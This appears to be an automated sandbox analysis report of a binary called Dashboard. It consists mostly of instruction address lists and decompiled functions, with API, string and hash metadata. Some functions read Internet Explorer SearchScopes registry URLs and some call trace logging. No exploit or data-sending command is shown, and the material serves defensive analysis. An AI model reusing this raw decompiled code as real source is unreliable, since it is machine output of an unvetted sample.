                                                                                                                    0x0100b374
                                                                                                                    0x0100b379
                                                                                                                    0x0100b37e
                                                                                                                    0x0100b381
                                                                                                                    0x0100b383
                                                                                                                    0x0100b386
                                                                                                                    0x00000000
                                                                                                                    0x0100b38c
                                                                                                                    0x0100b38d
                                                                                                                    0x0100b397
                                                                                                                    0x0100b399
                                                                                                                    0x0100b39b
                                                                                                                    0x0100b39f
                                                                                                                    0x0100b3ae
                                                                                                                    0x0100b3b1
                                                                                                                    0x0100b3b4
                                                                                                                    0x0100b3b4
                                                                                                                    0x0100b39f
                                                                                                                    0x0100b3ba
                                                                                                                    0x0100b3be
                                                                                                                    0x0100b3c1
                                                                                                                    0x0100b3c1
                                                                                                                    0x0100b3c9
                                                                                                                    0x0100b3ce
                                                                                                                    0x0100b3d0
                                                                                                                    0x0100b426
                                                                                                                    0x0100b42c
                                                                                                                    0x0100b42e
                                                                                                                    0x0100b5ac
                                                                                                                    0x0100b5ac
                                                                                                                    0x0100b5f9
                                                                                                                    0x00000000
                                                                                                                    0x0100b5fb
                                                                                                                    0x0100b43d
                                                                                                                    0x0100b443
                                                                                                                    0x0100b449
                                                                                                                    0x0100b44e
                                                                                                                    0x0100b45c
                                                                                                                    0x0100b45c
                                                                                                                    0x0100b46c
                                                                                                                    0x0100b473
                                                                                                                    0x0100b476
                                                                                                                    0x0100b4aa
                                                                                                                    0x0100b478
                                                                                                                    0x0100b478
                                                                                                                    0x0100b47d
                                                                                                                    0x0100b482
                                                                                                                    0x0100b484
                                                                                                                    0x0100b486
                                                                                                                    0x0100b48a
                                                                                                                    0x0100b496
                                                                                                                    0x0100b499
                                                                                                                    0x0100b49c
                                                                                                                    0x0100b49c
                                                                                                                    0x0100b48a
                                                                                                                    0x0100b4a1
                                                                                                                    0x0100b4a1
                                                                                                                    0x0100b4b2
                                                                                                                    0x0100b4b5
                                                                                                                    0x0100b4b7
                                                                                                                    0x0100b51e
                                                                                                                    0x0100b520
                                                                                                                    0x0100b526
                                                                                                                    0x0100b52b
                                                                                                                    0x0100b530
                                                                                                                    0x0100b532
                                                                                                                    0x0100b54f
                                                                                                                    0x0100b54f
                                                                                                                    0x0100b554
                                                                                                                    0x0100b55c
                                                                                                                    0x0100b55f
                                                                                                                    0x0100b564
                                                                                                                    0x0100b569
                                                                                                                    0x0100b56b
                                                                                                                    0x0100b56d
                                                                                                                    0x0100b571
                                                                                                                    0x0100b579
                                                                                                                    0x0100b57c
                                                                                                                    0x0100b57f
                                                                                                                    0x0100b57f
                                                                                                                    0x0100b571
                                                                                                                    0x0100b584
                                                                                                                    0x0100b588
                                                                                                                    0x0100b592
                                                                                                                    0x0100b592
                                                                                                                    0x0100b592
                                                                                                                    0x0100b58a
                                                                                                                    0x0100b58a
                                                                                                                    0x0100b58a
                                                                                                                    0x0100b59b
                                                                                                                    0x0100b59e
                                                                                                                    0x0100b5a0
                                                                                                                    0x0100b5bd
                                                                                                                    0x0100b5c4
                                                                                                                    0x0100b5f6
                                                                                                                    0x0100b5c6
                                                                                                                    0x0100b5c6
                                                                                                                    0x0100b5cb
                                                                                                                    0x0100b5cd
                                                                                                                    0x0100b5cf
                                                                                                                    0x0100b5d3
                                                                                                                    0x0100b5d8
                                                                                                                    0x0100b5db
                                                                                                                    0x0100b5de
                                                                                                                    0x0100b5de
                                                                                                                    0x0100b5d3
                                                                                                                    0x0100b5e3
                                                                                                                    0x0100b5e3
                                                                                                                    0x00000000
                                                                                                                    0x0100b5a2
                                                                                                                    0x0100b5a2
                                                                                                                    0x0100b5a8
                                                                                                                    0x0100b5aa
                                                                                                                    0x0100b5b8
                                                                                                                    0x00000000
                                                                                                                    0x0100b5b8
                                                                                                                    0x00000000
                                                                                                                    0x0100b5aa
                                                                                                                    0x0100b5a0
                                                                                                                    0x0100b534
                                                                                                                    0x0100b538
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x0100b53a
                                                                                                                    0x0100b542
                                                                                                                    0x0100b545
                                                                                                                    0x0100b548
                                                                                                                    0x00000000
                                                                                                                    0x0100b4b9
                                                                                                                    0x0100b4b9
                                                                                                                    0x0100b4c0
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x0100b4c2
                                                                                                                    0x0100b4c6
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x0100b4c8
                                                                                                                    0x0100b4cb
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x0100b4d0
                                                                                                                    0x0100b4d7
                                                                                                                    0x0100b4dc
                                                                                                                    0x0100b4de
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x0100b4e0
                                                                                                                    0x0100b4ea
                                                                                                                    0x0100b4ef
                                                                                                                    0x0100b4f1
                                                                                                                    0x0100b4f4
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x0100b4fa
                                                                                                                    0x0100b4ff
                                                                                                                    0x0100b501
                                                                                                                    0x0100b503
                                                                                                                    0x0100b507
                                                                                                                    0x0100b513
                                                                                                                    0x0100b516
                                                                                                                    0x0100b519
                                                                                                                    0x0100b519
                                                                                                                    0x0100b507
                                                                                                                    0x00000000
                                                                                                                    0x0100b501
                                                                                                                    0x0100b4b7
                                                                                                                    0x0100b3d2
                                                                                                                    0x0100b3d4
                                                                                                                    0x0100b3d8
                                                                                                                    0x0100b3da
                                                                                                                    0x0100b3ed
                                                                                                                    0x0100b3ed
                                                                                                                    0x0100b3f2
                                                                                                                    0x0100b3f4
                                                                                                                    0x0100b3f6
                                                                                                                    0x0100b3fa
                                                                                                                    0x0100b409
                                                                                                                    0x0100b40c
                                                                                                                    0x0100b40f
                                                                                                                    0x0100b40f
                                                                                                                    0x0100b3fa
                                                                                                                    0x0100b414
                                                                                                                    0x0100b414
                                                                                                                    0x0100b414
                                                                                                                    0x0100b418
                                                                                                                    0x0100b41b
                                                                                                                    0x00000000
                                                                                                                    0x0100b41b
                                                                                                                    0x0100b3e3
                                                                                                                    0x0100b3e6
                                                                                                                    0x0100b3e8
                                                                                                                    0x0100b3eb
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x0100b3eb
                                                                                                                    0x0100b34f
                                                                                                                    0x0100b34f
                                                                                                                    0x0100b609
                                                                                                                    0x0100b60c
                                                                                                                    0x0100b616
                                                                                                                    0x0100b616

                                                                                                                    APIs
                                                                                                                    • SysFreeString.OLEAUT32(00000000), ref: 0100B41B
                                                                                                                    • SysFreeString.OLEAUT32(00000000), ref: 0100B60C
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000001.00000002.259436616.0000000001001000.00000020.00000001.01000000.00000004.sdmp, Offset: 01000000, based on PE: true
                                                                                                                    • Associated: 00000001.00000002.259432248.0000000001000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.259455281.000000000101A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.259460165.000000000101B000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_1_2_1000000_Dashboard.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: FreeString
                                                                                                                    • String ID: W
                                                                                                                    • API String ID: 3341692771-655174618
                                                                                                                    • Opcode ID: ddcb0aa506ad8cf4e00f3d258a11899f11b4f21955fd123008d8c1f1386de31b
                                                                                                                    • Instruction ID: cb7ce2653f35779e91b58cf3547deb4d51cc3be3ba1d7766bdc9cb81a9597e04
                                                                                                                    • Opcode Fuzzy Hash: ddcb0aa506ad8cf4e00f3d258a11899f11b4f21955fd123008d8c1f1386de31b
                                                                                                                    • Instruction Fuzzy Hash: DC918C34200246EFFF679F69C944FAA7BA6FF04305F154498FA959B1A2C736DA10CB10
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    C-Code - Quality: 94%
                                                                                                                    			E010109AF(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
                                                                                                                    				signed int _t56;
                                                                                                                    				void* _t66;
                                                                                                                    				void* _t88;
                                                                                                                    				void* _t89;
                                                                                                                    				void* _t91;
                                                                                                                    				signed int _t93;
                                                                                                                    				void* _t97;
                                                                                                                    
                                                                                                                    				_t89 = __edx;
                                                                                                                    				_push(0x1c);
                                                                                                                    				E0100880F(E01016264, __ebx, __edi, __esi);
                                                                                                                    				 *(_t97 - 0x28) = 0;
                                                                                                                    				 *((intOrPtr*)(_t97 - 0x20)) = 0;
                                                                                                                    				 *((intOrPtr*)(_t97 - 4)) = 0;
                                                                                                                    				 *((intOrPtr*)(_t97 - 0x1c)) = 0;
                                                                                                                    				 *((char*)(_t97 - 4)) = 1;
                                                                                                                    				E01004D33(_t97 - 0x18, 0x101a5f0);
                                                                                                                    				_t91 = 0;
                                                                                                                    				 *((char*)(_t97 - 4)) = 2;
                                                                                                                    				 *(_t97 - 0xd) = 0;
                                                                                                                    				if( *((intOrPtr*)(_t97 + 8)) != 0) {
                                                                                                                    					_t93 = E0100C55B(_t97 - 0x20, 0x80000001, L"Software\\Microsoft\\Internet Explorer\\SearchScopes", 0, 0, 0x2001f, 0, 0);
                                                                                                                    					__eflags = _t93;
                                                                                                                    					if(__eflags != 0) {
                                                                                                                    						L13:
                                                                                                                    						if(__eflags > 0) {
                                                                                                                    							_t93 = _t93 & 0x0000ffff | 0x80070000;
                                                                                                                    						}
                                                                                                                    						goto L16;
                                                                                                                    					}
                                                                                                                    					_t93 = E01010615(_t89,  *((intOrPtr*)(_t97 - 0x20)), 0, _t97 - 0x1c,  *((intOrPtr*)(_t97 + 0xc)));
                                                                                                                    					__eflags = _t93;
                                                                                                                    					if(__eflags != 0) {
                                                                                                                    						goto L13;
                                                                                                                    					} else {
                                                                                                                    						goto L4;
                                                                                                                    					}
                                                                                                                    					do {
                                                                                                                    						L4:
                                                                                                                    						_push(L"URL");
                                                                                                                    						E0100653B(0, _t97 - 0x24, _t91, _t93, __eflags);
                                                                                                                    						 *((char*)(_t97 - 4)) = 3;
                                                                                                                    						_t56 = E010106BB( *((intOrPtr*)(_t97 - 0x1c)), _t97 - 0x24, _t97 - 0x18);
                                                                                                                    						_t95 = _t56;
                                                                                                                    						 *((char*)(_t97 - 4)) = 2;
                                                                                                                    						E01004925( *((intOrPtr*)(_t97 - 0x24)) + 0xfffffff0, _t89);
                                                                                                                    						__eflags = _t56;
                                                                                                                    						if(__eflags != 0) {
                                                                                                                    							goto L7;
                                                                                                                    						}
                                                                                                                    						_push( *((intOrPtr*)(_t97 + 8)));
                                                                                                                    						E0100653B(0, _t97 - 0x14, _t91, _t95, __eflags);
                                                                                                                    						 *((char*)(_t97 - 4)) = 4;
                                                                                                                    						E010061C3(0, _t97 - 0x14, E0100FC59(_t97 - 0x14));
                                                                                                                    						E010061C3(0, _t97 - 0x18, E0100FC59(_t97 - 0x18));
                                                                                                                    						_t66 = E01004CF1(_t97 - 0x18,  *((intOrPtr*)(_t97 - 0x14)), 0);
                                                                                                                    						_t88 =  *((intOrPtr*)(_t97 - 0x14)) + 0xfffffff0;
                                                                                                                    						__eflags = _t66 - 0xffffffff;
                                                                                                                    						if(_t66 != 0xffffffff) {
                                                                                                                    							 *(_t97 - 0xd) = 1;
                                                                                                                    							E01004925(_t88, _t89);
                                                                                                                    							L10:
                                                                                                                    							__eflags = _t93;
                                                                                                                    							if(__eflags != 0) {
                                                                                                                    								goto L13;
                                                                                                                    							}
                                                                                                                    							__eflags =  *(_t97 - 0xd);
                                                                                                                    							if( *(_t97 - 0xd) != 0) {
                                                                                                                    								_t93 =  *(_t97 - 0x28);
                                                                                                                    							} else {
                                                                                                                    								_t93 = 1;
                                                                                                                    							}
                                                                                                                    							goto L16;
                                                                                                                    						}
                                                                                                                    						 *((char*)(_t97 - 4)) = 2;
                                                                                                                    						E01004925(_t88, _t89);
                                                                                                                    						L7:
                                                                                                                    						E0100C53D(_t97 - 0x1c);
                                                                                                                    						_t91 = _t91 + 1;
                                                                                                                    						_t93 = E01010615(_t89,  *((intOrPtr*)(_t97 - 0x20)), _t91, _t97 - 0x1c,  *((intOrPtr*)(_t97 + 0xc)));
                                                                                                                    						__eflags = _t93;
                                                                                                                    					} while (__eflags == 0);
                                                                                                                    					goto L10;
                                                                                                                    				} else {
                                                                                                                    					_t93 = 0x80070057;
                                                                                                                    					L16:
                                                                                                                    					E01004925( *((intOrPtr*)(_t97 - 0x18)) + 0xfffffff0, _t89);
                                                                                                                    					E0100C53D(_t97 - 0x1c);
                                                                                                                    					E0100C53D(_t97 - 0x20);
                                                                                                                    					return E010088FB(_t93);
                                                                                                                    				}
                                                                                                                    			}










                                                                                                                    0x010109af
                                                                                                                    0x010109af
                                                                                                                    0x010109b6
                                                                                                                    0x010109bd
                                                                                                                    0x010109c0
                                                                                                                    0x010109c3
                                                                                                                    0x010109c6
                                                                                                                    0x010109d1
                                                                                                                    0x010109d5
                                                                                                                    0x010109da
                                                                                                                    0x010109df
                                                                                                                    0x010109e3
                                                                                                                    0x010109e6
                                                                                                                    0x01010a0d
                                                                                                                    0x01010a0f
                                                                                                                    0x01010a11
                                                                                                                    0x01010af4
                                                                                                                    0x01010af4
                                                                                                                    0x01010afc
                                                                                                                    0x01010afc
                                                                                                                    0x00000000
                                                                                                                    0x01010af4
                                                                                                                    0x01010a27
                                                                                                                    0x01010a29
                                                                                                                    0x01010a2b
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x01010a31
                                                                                                                    0x01010a31
                                                                                                                    0x01010a31
                                                                                                                    0x01010a39
                                                                                                                    0x01010a49
                                                                                                                    0x01010a4d
                                                                                                                    0x01010a58
                                                                                                                    0x01010a5a
                                                                                                                    0x01010a5e
                                                                                                                    0x01010a63
                                                                                                                    0x01010a65
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x01010a67
                                                                                                                    0x01010a6d
                                                                                                                    0x01010a75
                                                                                                                    0x01010a82
                                                                                                                    0x01010a93
                                                                                                                    0x01010a9f
                                                                                                                    0x01010aa7
                                                                                                                    0x01010aaa
                                                                                                                    0x01010aad
                                                                                                                    0x01010add
                                                                                                                    0x01010ae1
                                                                                                                    0x01010ae6
                                                                                                                    0x01010ae6
                                                                                                                    0x01010ae8
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x01010aea
                                                                                                                    0x01010aed
                                                                                                                    0x01010b04
                                                                                                                    0x01010aef
                                                                                                                    0x01010af1
                                                                                                                    0x01010af1
                                                                                                                    0x00000000
                                                                                                                    0x01010aed
                                                                                                                    0x01010aaf
                                                                                                                    0x01010ab3
                                                                                                                    0x01010ab8
                                                                                                                    0x01010abb
                                                                                                                    0x01010ac7
                                                                                                                    0x01010ad1
                                                                                                                    0x01010ad3
                                                                                                                    0x01010ad3
                                                                                                                    0x00000000
                                                                                                                    0x010109e8
                                                                                                                    0x010109e8
                                                                                                                    0x01010b07
                                                                                                                    0x01010b0d
                                                                                                                    0x01010b15
                                                                                                                    0x01010b1d
                                                                                                                    0x01010b29
                                                                                                                    0x01010b29

                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    • URL, xrefs: 01010A31
                                                                                                                    • Software\Microsoft\Internet Explorer\SearchScopes, xrefs: 010109FB
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000001.00000002.259436616.0000000001001000.00000020.00000001.01000000.00000004.sdmp, Offset: 01000000, based on PE: true
                                                                                                                    • Associated: 00000001.00000002.259432248.0000000001000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.259455281.000000000101A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.259460165.000000000101B000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_1_2_1000000_Dashboard.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: H_prolog3
                                                                                                                    • String ID: Software\Microsoft\Internet Explorer\SearchScopes$URL
                                                                                                                    • API String ID: 431132790-2486629086
                                                                                                                    • Opcode ID: 54afd7f4df248b2ffc78b6515565fb262a51a8e53f91164fa96bc0a2f1f73840
                                                                                                                    • Instruction ID: 9c38dd2e8fadd8a17dd919fd0e821342de46d882e91d47f3a67dee6a598af425
                                                                                                                    • Opcode Fuzzy Hash: 54afd7f4df248b2ffc78b6515565fb262a51a8e53f91164fa96bc0a2f1f73840
                                                                                                                    • Instruction Fuzzy Hash: C3419371C0015FEEEF12EBA8C9809FEBB74AF24218F5442A8E5D1731D9DA790E84C761
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    C-Code - Quality: 61%
                                                                                                                    			E01008FEA(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, char _a20, char* _a24, char* _a28, char _a32) {
                                                                                                                    				char* _t19;
                                                                                                                    				char* _t20;
                                                                                                                    				char* _t21;
                                                                                                                    				char* _t25;
                                                                                                                    				char* _t30;
                                                                                                                    				void* _t31;
                                                                                                                    				char _t32;
                                                                                                                    				char _t33;
                                                                                                                    				char* _t34;
                                                                                                                    				char* _t35;
                                                                                                                    				char* _t37;
                                                                                                                    				char* _t38;
                                                                                                                    
                                                                                                                    				_t34 = _a28;
                                                                                                                    				if(_t34 == 0) {
                                                                                                                    					_a28 = 0xa;
                                                                                                                    					L7:
                                                                                                                    					_t30 = L"NULL";
                                                                                                                    					if(_t34 == 0) {
                                                                                                                    						_t34 = _t30;
                                                                                                                    					} else {
                                                                                                                    						if( *_t34 == 0) {
                                                                                                                    							_t34 = L"<NULL>";
                                                                                                                    						}
                                                                                                                    					}
                                                                                                                    					_t35 = _a24;
                                                                                                                    					if(_t35 == 0) {
                                                                                                                    						_push(0xa);
                                                                                                                    						goto L18;
                                                                                                                    					} else {
                                                                                                                    						if( *_t35 != 0) {
                                                                                                                    							_t21 = _t35;
                                                                                                                    							_t37 =  &(_t21[2]);
                                                                                                                    							do {
                                                                                                                    								_t32 =  *_t21;
                                                                                                                    								_t21 =  &(_t21[2]);
                                                                                                                    							} while (_t32 != 0);
                                                                                                                    							_t31 = (_t21 - _t37 >> 1) + (_t21 - _t37 >> 1) + 2;
                                                                                                                    							L19:
                                                                                                                    							if(_t35 == 0) {
                                                                                                                    								_t19 = _t30;
                                                                                                                    							} else {
                                                                                                                    								if( *_t35 != 0) {
                                                                                                                    									_t19 = _t35;
                                                                                                                    								} else {
                                                                                                                    									_t19 = L"<NULL>";
                                                                                                                    								}
                                                                                                                    							}
                                                                                                                    							_push(0);
                                                                                                                    							_push(4);
                                                                                                                    							_push( &_a32);
                                                                                                                    							_push(_a28);
                                                                                                                    							_push(_t34);
                                                                                                                    							_push(_t31);
                                                                                                                    							_push(_t19);
                                                                                                                    							_push(4);
                                                                                                                    							_t20 =  &_a20;
                                                                                                                    							_push(_t20);
                                                                                                                    							_push(_a12);
                                                                                                                    							_push(_a16);
                                                                                                                    							_push(0x2b);
                                                                                                                    							_push(_a8);
                                                                                                                    							_push(_a4);
                                                                                                                    							L01007CCA();
                                                                                                                    							return _t20;
                                                                                                                    						}
                                                                                                                    						_push(0xe);
                                                                                                                    						L18:
                                                                                                                    						_pop(_t31);
                                                                                                                    						goto L19;
                                                                                                                    					}
                                                                                                                    				}
                                                                                                                    				if( *_t34 != 0) {
                                                                                                                    					_t25 = _t34;
                                                                                                                    					_t38 =  &(_t25[2]);
                                                                                                                    					do {
                                                                                                                    						_t33 =  *_t25;
                                                                                                                    						_t25 =  &(_t25[2]);
                                                                                                                    					} while (_t33 != 0);
                                                                                                                    					_a28 = (_t25 - _t38 >> 1) + (_t25 - _t38 >> 1) + 2;
                                                                                                                    				} else {
                                                                                                                    					_a28 = 0xe;
                                                                                                                    				}
                                                                                                                    			}















                                                                                                                    0x01008fef
                                                                                                                    0x01008ff7
                                                                                                                    0x01009024
                                                                                                                    0x0100902b
                                                                                                                    0x0100902d
                                                                                                                    0x01009032
                                                                                                                    0x01009041
                                                                                                                    0x01009034
                                                                                                                    0x01009038
                                                                                                                    0x0100903a
                                                                                                                    0x0100903a
                                                                                                                    0x01009038
                                                                                                                    0x01009043
                                                                                                                    0x01009048
                                                                                                                    0x0100906d
                                                                                                                    0x00000000
                                                                                                                    0x0100904a
                                                                                                                    0x0100904e
                                                                                                                    0x01009054
                                                                                                                    0x01009056
                                                                                                                    0x01009059
                                                                                                                    0x01009059
                                                                                                                    0x0100905d
                                                                                                                    0x0100905e
                                                                                                                    0x01009067
                                                                                                                    0x01009070
                                                                                                                    0x01009072
                                                                                                                    0x01009085
                                                                                                                    0x01009074
                                                                                                                    0x01009078
                                                                                                                    0x01009081
                                                                                                                    0x0100907a
                                                                                                                    0x0100907a
                                                                                                                    0x0100907a
                                                                                                                    0x01009078
                                                                                                                    0x01009087
                                                                                                                    0x01009089
                                                                                                                    0x0100908e
                                                                                                                    0x0100908f
                                                                                                                    0x01009092
                                                                                                                    0x01009093
                                                                                                                    0x01009094
                                                                                                                    0x01009095
                                                                                                                    0x01009097
                                                                                                                    0x0100909a
                                                                                                                    0x0100909b
                                                                                                                    0x0100909e
                                                                                                                    0x010090a1
                                                                                                                    0x010090a3
                                                                                                                    0x010090a6
                                                                                                                    0x010090a9
                                                                                                                    0x010090b5
                                                                                                                    0x010090b5
                                                                                                                    0x01009050
                                                                                                                    0x0100906f
                                                                                                                    0x0100906f
                                                                                                                    0x00000000
                                                                                                                    0x0100906f
                                                                                                                    0x01009048
                                                                                                                    0x01008ffd
                                                                                                                    0x01009008
                                                                                                                    0x0100900a
                                                                                                                    0x0100900d
                                                                                                                    0x0100900d
                                                                                                                    0x01009011
                                                                                                                    0x01009012
                                                                                                                    0x0100901f
                                                                                                                    0x01008fff
                                                                                                                    0x01008fff
                                                                                                                    0x01008fff

                                                                                                                    APIs
                                                                                                                    • TraceMessage.ADVAPI32(?,?,0000002B,?,?,?,00000004,NULL,0000000A,NULL,0000000A,?,00000004,00000000), ref: 010090A9
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000001.00000002.259436616.0000000001001000.00000020.00000001.01000000.00000004.sdmp, Offset: 01000000, based on PE: true
                                                                                                                    • Associated: 00000001.00000002.259432248.0000000001000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.259455281.000000000101A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.259460165.000000000101B000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_1_2_1000000_Dashboard.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: MessageTrace
                                                                                                                    • String ID: <NULL>$NULL
                                                                                                                    • API String ID: 471583391-888386124
                                                                                                                    • Opcode ID: 7f61009d283e2e659d21aaae52fd51ddf810fde100197fec68c1275282cdf7b1
                                                                                                                    • Instruction ID: 1bd824c114ff281ebb640d63e436bdaea86dad4de0134852e8fd86047675794b
                                                                                                                    • Opcode Fuzzy Hash: 7f61009d283e2e659d21aaae52fd51ddf810fde100197fec68c1275282cdf7b1
                                                                                                                    • Instruction Fuzzy Hash: DF218E7260020A9FFB139F08CC04BAB77A5EB84718F058155FACD9B1D2E775DA958780
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    C-Code - Quality: 63%
                                                                                                                    			E0100BF6D(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, char* _a20, char* _a24, char _a28) {
                                                                                                                    				char* _t18;
                                                                                                                    				char* _t19;
                                                                                                                    				char* _t23;
                                                                                                                    				char* _t28;
                                                                                                                    				void* _t29;
                                                                                                                    				char _t30;
                                                                                                                    				char _t31;
                                                                                                                    				char* _t32;
                                                                                                                    				char* _t33;
                                                                                                                    				char* _t35;
                                                                                                                    				char* _t36;
                                                                                                                    
                                                                                                                    				_t32 = _a24;
                                                                                                                    				if(_t32 == 0) {
                                                                                                                    					_a24 = 0xa;
                                                                                                                    					L7:
                                                                                                                    					_t28 = L"NULL";
                                                                                                                    					if(_t32 == 0) {
                                                                                                                    						_t32 = _t28;
                                                                                                                    					} else {
                                                                                                                    						if( *_t32 == 0) {
                                                                                                                    							_t32 = L"<NULL>";
                                                                                                                    						}
                                                                                                                    					}
                                                                                                                    					_t33 = _a20;
                                                                                                                    					if(_t33 == 0) {
                                                                                                                    						_push(0xa);
                                                                                                                    						goto L18;
                                                                                                                    					} else {
                                                                                                                    						if( *_t33 != 0) {
                                                                                                                    							_t19 = _t33;
                                                                                                                    							_t35 =  &(_t19[2]);
                                                                                                                    							do {
                                                                                                                    								_t30 =  *_t19;
                                                                                                                    								_t19 =  &(_t19[2]);
                                                                                                                    							} while (_t30 != 0);
                                                                                                                    							_t29 = (_t19 - _t35 >> 1) + (_t19 - _t35 >> 1) + 2;
                                                                                                                    							L19:
                                                                                                                    							if(_t33 == 0) {
                                                                                                                    								_t18 = _t28;
                                                                                                                    							} else {
                                                                                                                    								if( *_t33 != 0) {
                                                                                                                    									_t18 = _t33;
                                                                                                                    								} else {
                                                                                                                    									_t18 = L"<NULL>";
                                                                                                                    								}
                                                                                                                    							}
                                                                                                                    							_push(0);
                                                                                                                    							_push(4);
                                                                                                                    							_push( &_a28);
                                                                                                                    							_push(_a24);
                                                                                                                    							_push(_t32);
                                                                                                                    							_push(_t29);
                                                                                                                    							_push(_t18);
                                                                                                                    							_push(_a12);
                                                                                                                    							_push(_a16);
                                                                                                                    							_push(0x2b);
                                                                                                                    							_push(_a8);
                                                                                                                    							_push(_a4);
                                                                                                                    							L01007CCA();
                                                                                                                    							return _t18;
                                                                                                                    						}
                                                                                                                    						_push(0xe);
                                                                                                                    						L18:
                                                                                                                    						_pop(_t29);
                                                                                                                    						goto L19;
                                                                                                                    					}
                                                                                                                    				}
                                                                                                                    				if( *_t32 != 0) {
                                                                                                                    					_t23 = _t32;
                                                                                                                    					_t36 =  &(_t23[2]);
                                                                                                                    					do {
                                                                                                                    						_t31 =  *_t23;
                                                                                                                    						_t23 =  &(_t23[2]);
                                                                                                                    					} while (_t31 != 0);
                                                                                                                    					_a24 = (_t23 - _t36 >> 1) + (_t23 - _t36 >> 1) + 2;
                                                                                                                    				} else {
                                                                                                                    					_a24 = 0xe;
                                                                                                                    				}
                                                                                                                    			}














                                                                                                                    0x0100bf72
                                                                                                                    0x0100bf7a
                                                                                                                    0x0100bfa7
                                                                                                                    0x0100bfae
                                                                                                                    0x0100bfb0
                                                                                                                    0x0100bfb5
                                                                                                                    0x0100bfc4
                                                                                                                    0x0100bfb7
                                                                                                                    0x0100bfbb
                                                                                                                    0x0100bfbd
                                                                                                                    0x0100bfbd
                                                                                                                    0x0100bfbb
                                                                                                                    0x0100bfc6
                                                                                                                    0x0100bfcb
                                                                                                                    0x0100bff0
                                                                                                                    0x00000000
                                                                                                                    0x0100bfcd
                                                                                                                    0x0100bfd1
                                                                                                                    0x0100bfd7
                                                                                                                    0x0100bfd9
                                                                                                                    0x0100bfdc
                                                                                                                    0x0100bfdc
                                                                                                                    0x0100bfe0
                                                                                                                    0x0100bfe1
                                                                                                                    0x0100bfea
                                                                                                                    0x0100bff3
                                                                                                                    0x0100bff5
                                                                                                                    0x0100c008
                                                                                                                    0x0100bff7
                                                                                                                    0x0100bffb
                                                                                                                    0x0100c004
                                                                                                                    0x0100bffd
                                                                                                                    0x0100bffd
                                                                                                                    0x0100bffd
                                                                                                                    0x0100bffb
                                                                                                                    0x0100c00a
                                                                                                                    0x0100c00c
                                                                                                                    0x0100c011
                                                                                                                    0x0100c012
                                                                                                                    0x0100c015
                                                                                                                    0x0100c016
                                                                                                                    0x0100c017
                                                                                                                    0x0100c018
                                                                                                                    0x0100c01b
                                                                                                                    0x0100c01e
                                                                                                                    0x0100c020
                                                                                                                    0x0100c023
                                                                                                                    0x0100c026
                                                                                                                    0x0100c032
                                                                                                                    0x0100c032
                                                                                                                    0x0100bfd3
                                                                                                                    0x0100bff2
                                                                                                                    0x0100bff2
                                                                                                                    0x00000000
                                                                                                                    0x0100bff2
                                                                                                                    0x0100bfcb
                                                                                                                    0x0100bf80
                                                                                                                    0x0100bf8b
                                                                                                                    0x0100bf8d
                                                                                                                    0x0100bf90
                                                                                                                    0x0100bf90
                                                                                                                    0x0100bf94
                                                                                                                    0x0100bf95
                                                                                                                    0x0100bfa2
                                                                                                                    0x0100bf82
                                                                                                                    0x0100bf82
                                                                                                                    0x0100bf82

                                                                                                                    APIs
                                                                                                                    • TraceMessage.ADVAPI32(?,?,0000002B,?,?,NULL,0000000A,NULL,0000000A,?,00000004,00000000), ref: 0100C026
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000001.00000002.259436616.0000000001001000.00000020.00000001.01000000.00000004.sdmp, Offset: 01000000, based on PE: true
                                                                                                                    • Associated: 00000001.00000002.259432248.0000000001000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.259455281.000000000101A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.259460165.000000000101B000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_1_2_1000000_Dashboard.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: MessageTrace
                                                                                                                    • String ID: <NULL>$NULL
